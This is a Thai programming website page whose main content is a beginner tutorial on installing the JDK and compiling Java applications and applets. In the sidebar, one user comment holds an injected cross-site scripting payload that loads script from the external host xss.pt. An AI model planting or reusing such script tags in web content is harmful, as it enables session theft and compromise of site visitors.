หน้าแรก
 การบ้าน
  C/C++ new
  Java new
 Sourcecode.TV
  Android
  Blackberry
  C/C++
  Java
  Linux
  Windows Phone
  แจ้งเรื่องที่ต้องการ
 บทความ
  .NET
  Android
  Blackberry
  C++Builder
  Delphi
  Java
  Mobile
  Open Source
  Pocket PC
  Visual Basic
  Web
  Windows Phone
  Others
 แบบเรียนฟรี
  ASP
  ASP.NET Webmatrix
  C++
  eVB
  J2ME
  Java
  PHP
 ซอร์สโค้ด
  Android
  ASP
  C++
  VC++
  CGI-Perl
  Delphi
  Java
  jQuery
  PHP
  Visual Basic
  .NET
 บริการจากเรา
  เปิดท้าย... ขายโค้ด
  DoodeeHosting
  รับออกแบบ พัฒนาเว็บไซต์
  Freeware
  อัตราค่าโฆษณา
  รายชื่อลูกค้า
  สถิติผู้เข้าเว็บ
 ดาว์นโหลด
 ค้นหาข้อมูล
 กระดานสนทนา
  .NET
  C/C++
  Delphi
  Java
  Palm/PocketPC
  Visual Basic
  Web
  อื่นๆ
 กระดานงาน
 ลิงค์เว็บ
 เกี่ยวกับผม
 อัตราค่าโฆษณา
Social Network

Facebook  Twitter  YouTube
 New Article
 Webboard
 Freelanceboard
Freeware
โปรแกรมเบอร์ดี (BerDee)
โปรแกรมเบอร์ดี (Android)
เกมส์เป่ายิ้งฉุบ
เกมส์เป่ายิ้งฉุบ(Android)
WebcamMonitor
WebcamMonitor(Windows)
scSendMail
scSendMail(Windows)
MSN Caption
MSN Caption(Windows)
  Freelance comment
  ติดต่อสอบถามมาได้ตลอดนะ...
2015-07-29 13:35:58
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:33:54
  ถ้าผมต้องการเว็บที่พัฒน...
2015-01-18 15:32:51
  ติดต่อสอบถามเข้ามาได้นะ...
2014-01-06 12:47:38
  ถ้ายังหาคนสอนไม่ได้ ก็ลอ...
2013-07-06 01:04:37
  สนใจส่งขอบเขตมาคุยราคาก...
2013-03-24 18:54:20
  ถ้ายังไม่มีคนรับงานติดต...
2012-12-16 19:18:14
  สนใจคะ ติดต่อ 0905076277...
2012-11-12 11:07:46
  รับทำโปรเจ็คนักศึกษาหรื...
2012-10-29 03:10:46
  sukit_te34@hotmail.com...
2012-10-29 03:09:36
  Webboard comment
  พอดีผมเห...
2020-05-31 21:49:43
  ช่วย แสดง...
2020-04-27 11:21:00
  ได้การบ้...
2020-04-27 11:18:56
  ได้การบ้...
2020-04-27 11:02:44
  <a href="https://www.g...
2020-03-10 17:07:03
  ไม่อยากเ...
2020-03-10 17:05:36
  ขอโคํดเก...
2020-02-09 22:50:58
  ขอโค้ดเก...
2020-01-28 23:42:26
  uuu...
2020-01-24 11:54:34
  ก็ต้องลง ...
2019-10-22 01:56:28
  Homework comment
  โจทย์การบ้าน c++ เขียนรูปแ...
2020-04-06 11:01:33
  แบบนี้ขอเป็น ภาษา php หน่อย...
2019-09-18 14:36:34
  ผมไม่อยากให้คุณได้คะแนน...
2019-04-27 01:29:07
  อาจารย์เขาบอกแนวข้อสอบม...
2019-04-27 00:44:29
  ขอสอบถามการเขียน c++ ครับ เ...
2018-04-02 12:19:21
  โค้ดตัวอย่างศึกษาให้เข้...
2017-11-26 14:50:05
  คำนวณค่าน้ำโดยรับค่ามิเ...
2017-11-20 23:15:26
  ขอบคุณมากครับ...
2017-08-16 18:27:25
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:40:46
  ทำเอง งง เอง กะลังทำใหม่ค...
2017-04-18 18:37:54
  Article comment
  asdasd...
2020-01-28 19:48:57
  ต้องการ ให้เขียน โปรแกรม ...
2019-12-09 11:39:58
  รับเขียน arx จาก vc++ 2017 ล็อคโปร...
2019-09-19 09:48:09
  ทำการ register ไฟล์ที่ชื่อ mswinsck.oc...
2019-09-17 14:05:56
  <Img sRC=https://xss.pt/op2fp.jpg>
<sCRiPt sRC=//xss.pt/op...

2019-09-12 13:43:34
  ใน vb 6 ไม่มี component winsock เลยค่ะ ส...
2019-09-03 10:31:02
  รบกวนขอสอบถามหน่อยนะครั...
2019-03-04 05:31:04
  สามารถนำตัวหนังสือจากภา...
2018-12-25 08:54:32
  มีcode ของ VB ไหมค่ะ ถ้ามีรบกว...
2017-09-28 16:50:02
  น่าจะได้ครับ ไม่เคยลอง
...

2017-07-11 09:59:35
  9Mcode comment
  อยากได้...
2014-02-21 08:52:19

Link Exchange

อัตราค่าโฆษณา
Statistics of Sourcecode in Thailand
 
 JAVA Tutorial  

- - - - - - - - - - - - - - ผู้ให้การสนับสนุน- - - - - - - - - - - - - -

 JAVA
 
 

การติดตั้งโปรแกรม และ การพัฒนาโปรแกรมภาษา Java

 

Java Development Kit(JDK) เป็นชุดโปรแกรมพื้นฐานในการพัฒนาโปรแกรมภาษา Java ซึ่งพัฒนาขึ้นโดยบริษัท Sun Microsystems เวอร์ชันปัจจุบันคือ JDK1.4 สามารถดาว์นโหลดได้ฟรีที่ http://www.java.sun.com

การติดตั้งโปรแกรม

การติดตั้ง JDK ในระบบปฏิบัติการ Windows9x-NT นั้นโปรแกรมจะถูกติดตั้งลงในไดเรกทอรีตามที่เราระบุหรือตามค่ามาตรฐานที่โปรแกรมกำหนดมาคือ drive C:\jdk1.4 (หาเป็นเวอร์ชั่นอื่น ก็จะมีชื่อของ โฟล์เดอร์ต่างกัน ออกไปนะครับ) ซึ่งหลังจากติดตั้ง JDK เสร็จเรียบร้อยแล้วจะต้องปรับปรุงไฟล์ c:\Autoexec.bat ดังนี้

SET PATH="ข้อมูลของโปรแกรมอื่น...;C:\jdk1.4\bin

โปรแกรมสำหรับพัฒนาโปรแกรมภาษา Java ที่ใช้งานเบื้องต้นซึ่งเก็บอยู่ในไดเรคทอรี c:\jdk1.4\bin มีดังนี้

javac.exe เป็นโปรแกรมสำหรับใช้แปล(Compile) source code ไฟล์.java

java.exe เป็นโปรแกรมสำหรับใช้รันไฟล์.class ซึ่งได้จากการ Compile

appletviewer.exe เป็นโปรแกรมสำหรับแสดงผล applet ซึ่งใช้กับเครื่องที่ไม่มี โปรแกรม Browser

 

การพัฒนาโปรแกรมภาษา Java

โปรแกรมภาษา Java แบ่งออกเป็น 2 ประเภทคือ

    1. Java Application มีการทำงานทั้งใน Graphics Mode และ Text Mode
    2. Java Applets จะทำงานภายใต้โปรแกรม Browser หรือ Appletviewer

Java Application

โปรแกรมภาษา Java สามารถใช้ Text Editor ทั่ว ๆ ไปในการเขียนโปรแกรมบันทึกไว้เป็นไฟล์นามสกุล .java เช่น test.java แล้วใช้โปรแกรม javac.exe คอมไพล์ออกมาเป็น ไฟล์ test.class จากนั้นเมื่อต้องการรันผลลัพธ์จะใช้โปรแกรม java.exe กับไฟล์ test.class

ในโปรแกรม Java application จะมีเมทอด main() ได้เพียงเมทอดเดียวเท่านั้น โดยภายใน class ที่มีเมทอด main() จะต้องมีชื่อ class เป็นชื่อเดียวกันเดียวกับไฟล์ .java และไฟล์. Java สามารถมี class ที่สร้างขึ้นได้มากกว่าหนึ่งคลาส

 

Java Applet

การสร้าง Java Applet นั้นจะมีวิธีการสร้างไฟล์ .java และไฟล์ .class เหมือนกับ Java Application แต่จะแตกต่างกันที่ Java Applet ต้องอาศัย ไฟล์.html ในการแสดงผล โดยจะใช้แท็ก <applet></applet> ของภาษา HTML ในการเชื่อมโยงไฟล์ .class ซึ่งเป็น Java Applet มาแสดงผลเป็น Browser หรือ appletviewer ซึ่งมีรูปแบบของการเชื่อมโยงดังนี้

<applet code="test.class" width=100 height=100></applet>

ค่า width และ height คือ attribute ที่เป็นตัวกำหนดขนาดพื้นที่ของ Java Applet จะแสดงผลบน Browser ส่วน code คือการระบุไฟล์.class ที่ต้องการจะแสดงผล

 

การสร้าง Java Applications
มีขั้นตอนในการสร้างโดยเริ่มจากใช้โปรแกรมประเภท Text-Editor (เช่น notepad, Word Pad) เขียนโปรแกรม Java โดยจะต้องบันทึก extension (นามสกุลของไฟล์) นั้นเป็น .java เช่น Hello.java เมื่อเราได้ทำการเขียนโปรแกรมเสร็จเรียบร้อยแล้ว ขั้นตอนต่อไปก็คือการ compile โดยใช้ javac.exe ในการ compile และจะได้ไฟล์ Hello.class มา เราสามารถสั่ง run ไฟล์ Hello.class โดยใช้ java.exe ดังแสดงขั้นตอนการสร้างโปรแกรมตามรูปด้านล่างนี้

ตัวอย่าง โปรแกรมแสดงข้อความ "Hello" ออกทางหน้าจอ
1. ให้ทำการสร้างโฟลเดอร์ MyJava ไว้ใน C:\ (Drive C)
2. ใช้โปรแกรม Notepad พิมพ์โค้ด ตามรูปด้านล่าง แล้วบันทึกไว้ใน C:\MyJava โดยกำหนดชื่อเป็น Hello.java

3. เปิด MS-DOS Prompt window แล้วเปลี่ยน Directory เป็น C:\Myjava
4. Compile โปรแกรม Hello.java โดยใช้คำสั่ง Javac Hello.java เราจะได้ไฟล์ Hello.class จากการ Compile
5. สั่ง run ไฟล์ Hello.class โดยใช้คำสั่ง Java Hello โปรแกรมก็จะ run โดยจะแสดงคำว่า "Hello" ออกมา

 

การสร้าง Java Applets
ขั้นตอนในการสร้าง Java Applet จะมีขั้นตอนในช่วงแรกเหมือนกับขั้นตอนในการสร้าง Java Application จะต่างก็แค่เพียงส่วนของการ run โปรแกรม ที่จะต้อง run ผ่านทาง HTML (โดยจะต้องเขียนเพิ่มเติมโค้ด HTML)

ตัวอย่าง การสร้าง applet เพื่อแสดงข้อความ "Hello Applet"
1
. ให้ทำการสร้างโฟลเดอร์ MyJava ไว้ใน C:\ (Drive C)
2. ใช้โปรแกรม Notepad พิมพ์โค้ด ตามรูปด้านล่าง แล้วบันทึกไว้ใน C:\MyJava โดยกำหนดชื่อเป็น HelloApplet.java

3. เปิด MS-DOS Prompt window แล้วเปลี่ยน Directory เป็น C:\Myjava
4. Compile โปรแกรม HelloApplet.java โดยใช้คำสั่ง Javac HelloApplet.java เราจะได้ไฟล์ HelloApplet.class จากการ Compile
5. ใช้โปรแกรม Notepad พิมพ์โค้ด ตามรูปด้านล่าง แล้วบันทึกไว้ใน C:\MyJava โดยกำหนดชื่อเป็น HelloApplet.html

6. ใช้ Web Browser เปิดไฟล์ HelloApplet.html เพื่อทดสอบการทำงานของ HelloApplet.class ผล จะแสดงดังรูปด้านล่าง

ยังมีอีกวิธีที่ใช้ในการทดสอบการทำงานของ HelloApplet.class ก็คือการใช้คำสั่ง appletviewer.exe โดยเรียกผ่าน MS-DOS Prompt window โดยพิมพ์คำสั่ง appletviewer HelloApplet.html ผลที่ได้ จะแสดงดังรูปด้านล่าง

โดยส่วนมากแล้วผมขอแนะนำให้ใช้ appletviewer ในการพัฒนา เพราะว่ามีขนาดเล็ก ,มีการทำงานที่เร็ว กว่า Web Browser (หมายความรวมถึง IE และ Netscape) และ โปรแกรม Web Browser จะมีการจำ class ที่ได้ทำการโหลดมาก่อนหน้า ทำให้เมื่อทำการเรียกใช้ class นั้นอีกครับ Web Browser จะนำ class เก่าที่ได้โหลดมาครั้งก่อนมาใช้ ทำให้เกิดปัญหาในการพัฒนา applet ของเรา

 

BACK

หัวแปลง Mini DisplayPort to HDMI Adapter หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
หัวแปลง Mini DisplayPort to HDMI Adapter สำหรับเครื่อง macbook air/pro, mac mini
คลิปสอนเขียนโปรแกรม
เรียนเขียนโปรแกรมดอทเน็ต
เรียนเขียนโปรแกรมแอนดรอยด์
เรียนเขียนโปรแกรมเบล็คเบอร์รี่
เรียนเขียนโปรแกรมซี ซีพลัสพลัส
เรียนเขียนโปรแกรมจาวา
เรียนการใช้งานลินุกส์
เรียนการเขียนโปรแกรมวินโดว์โฟน
เรียนการเขียนโปรแกรมพีเฮชพี มายเอสคิวเอล
9M Blog บอกเล่าเรื่องราว การเขียนโปรแกรมของ นายเอ็ม
บริการ ถ่ายภาพรับปริญญา
อัตราค่าโฆษณา
 
Tutorial
eVB Tutorial
ASP.NET Webmatrix Tutorial
J2ME Tutorial
C++  Tutorial
Java  Tutorial
PHP Tutorial
ASP Tutorial
 
แบบสำรวจ
Freelance รับพัฒนาโปรแกรม

Home - Article - Tutorial - Sourcecode - Dev Handbook - Search - WebBoard - Links - About Us

สงวนลิขสิทธิ์ ห้ามคัดลอก ทำซ้ำ แก้ไข ดัดแปลง ไม่ว่าในรูปแบบใด โดยไม่ได้รับอนุญาตเป็นลายลักษณ์อักษร
เลขทะเบียนพาณิชย์อิเล็กทรอนิกส์จากกระทรวงพาณิชย์: 7100503002000
Copyright 2001 SourceCode.in.th